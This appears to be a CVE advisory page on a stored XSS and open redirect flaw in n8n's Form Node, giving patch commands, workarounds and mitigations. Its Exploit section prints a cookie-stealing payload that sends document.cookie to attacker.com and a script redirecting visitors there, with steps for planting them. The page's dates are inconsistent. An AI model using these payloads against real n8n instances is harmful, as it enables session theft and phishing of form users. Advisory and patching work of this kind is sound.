n8n Form Node Cross-Site Scripting & Open Redirect, CVE-2026-56354 (Medium) -DC-Jul2026-935

Listen to this Post

How CVE-2026-56354 Works

n8n is a popular workflow automation platform that allows users to create complex integrations through a visual interface. One of its core components is the Form Node, which enables workflow creators to build and publish web forms that end users can interact with. These forms are rendered within the n8n application and can include custom HTML descriptions and iframe embeds to provide context or additional functionality to the user.
The vulnerability stems from two distinct but related flaws in how the Form Node handles user-supplied content:
1. Unsanitized HTML Description Fields – When a privileged user (with workflow creation or modification permissions) configures a Form Node, they can populate a “description” field with arbitrary HTML. Prior to the patched versions, this input was not properly sanitized or escaped before being rendered in the end user’s browser. This allows an attacker to inject malicious JavaScript into the description, which is then stored in the workflow configuration. When an end user visits the published form, the injected script executes in their browser context, leading to a stored Cross-Site Scripting (XSS) attack.
2. Overly Permissive iframe Sandbox Policies – The Form Node also supports embedding external content via iframes. The sandbox attributes applied to these iframes were configured with overly permissive policies, allowing embedded content to navigate the top-level browsing context. An attacker can craft a form with a malicious redirect parameter, causing any end user who visits the form to be silently redirected to an arbitrary external URL – an Open Redirect vulnerability.
These two issues can be chained together for more sophisticated attacks. For example, a stored XSS payload could be used to steal session cookies, capture form submissions, or perform actions on behalf of the user. The open redirect can be leveraged for phishing campaigns, where users are tricked into visiting a legitimate-looking n8n form that then redirects them to a malicious site designed to harvest credentials.
The attack requires the attacker to be an authenticated n8n user with permissions to create or modify workflows – a privilege typically granted to internal team members or power users. However, in multi-tenant or shared n8n environments, this significantly expands the attack surface. The vulnerability affects all n8n versions before 1.123.24, 2.10.4, and 2.12.0 across both the 1.x and 2.x branches.

DailyCVE Form:

Platform: n8n
Version: <1.123.24, <2.10.4, <2.12.0
Vulnerability: Stored XSS & Open Redirect
Severity: Medium (CVSS 4.1)
date: 2026-07-10

Prediction: 2026-03-11 (already patched)

What Undercode Say:

Check currently installed n8n version
n8n --version
Upgrade to the latest patched version
npm install -g n8n@latest
Or upgrade to specific patched versions
npm install -g [email protected] for 1.x branch
npm install -g [email protected] for 2.x branch (up to 2.10.x)
npm install -g [email protected] for 2.11.x branch
Verify the upgrade
n8n --version

Workaround – Disable Form Nodes via Environment Variables:

Disable Form Node
export NODES_EXCLUDE="n8n-nodes-base.form"
Disable Form Trigger Node
export NODES_EXCLUDE="n8n-nodes-base.formTrigger"
Disable both
export NODES_EXCLUDE="n8n-nodes-base.form,n8n-nodes-base.formTrigger"

Docker Deployment Mitigation:

docker-compose.yml
environment:
- NODES_EXCLUDE=n8n-nodes-base.form,n8n-nodes-base.formTrigger

Verification of Fix:

Check if the Form Node is disabled
curl -s http://localhost:5678/rest/nodes | jq '.[] | select(.name | contains("Form"))'

Exploit:

An authenticated attacker with workflow creation permissions can perform the following actions:

Stored XSS Payload Injection:

  1. Create a new workflow or edit an existing one.

2. Add a Form Node to the workflow.

  1. In the Form Node configuration, locate the “Description” or “HTML” field.

4. Inject a malicious script payload, for example:

<img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)" />

or

<script>window.location='https://attacker.com/phish?redirect='+encodeURIComponent(window.location)</script>

5. Save and publish the workflow.

  1. When any end user visits the published form URL, the payload executes in their browser.

Open Redirect Exploitation:

1. Create a workflow with a Form Node.

  1. Configure the form’s redirect or iframe parameters to point to an external malicious URL.
  2. Publish the form and distribute the link to victims.
  3. Victims visiting the legitimate n8n form are silently redirected to the attacker-controlled site.

Protection:

  • Immediate Upgrade: The most effective protection is to upgrade to n8n 1.123.24, 2.10.4, 2.12.0, or later.
  • Restrict Permissions: Limit workflow creation and editing permissions to only fully trusted users.
  • Disable Form Nodes: If upgrading is not immediately possible, disable the Form Node and Form Trigger Node by adding them to the `NODES_EXCLUDE` environment variable.
  • Input Validation: Implement strict HTML sanitization (using libraries like DOMPurify) for all user-supplied HTML content in form descriptions.
  • iframe Sandbox Hardening: Enforce restrictive iframe sandbox policies – remove `allow-top-navigation` and other permissive attributes.
  • Content Security Policy (CSP): Deploy a strict CSP header to restrict script execution and block inline scripts.
  • Regular Audits: Periodically review workflow configurations for any suspicious or unauthorized Form Node usage.

Impact:

  • Stored Cross-Site Scripting (XSS): Attackers can execute arbitrary JavaScript in the context of any end user visiting the compromised form. This can lead to session hijacking, credential theft, form submission hijacking, and unauthorized actions performed on behalf of the victim.
  • Open Redirect: Malicious actors can redirect users to phishing sites, malware distribution pages, or credential harvesting portals, severely damaging user trust and brand reputation.
  • Phishing Campaigns: The combination of XSS and open redirect allows attackers to craft highly convincing phishing attacks that appear to originate from a trusted n8n instance.
  • Data Exfiltration: Injected scripts can capture sensitive form data submitted by end users, including personally identifiable information (PII), financial details, or authentication credentials.
  • Compliance Violations: Exploitation may lead to data breaches, triggering regulatory fines under frameworks like GDPR, HIPAA, or PCI-DSS.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top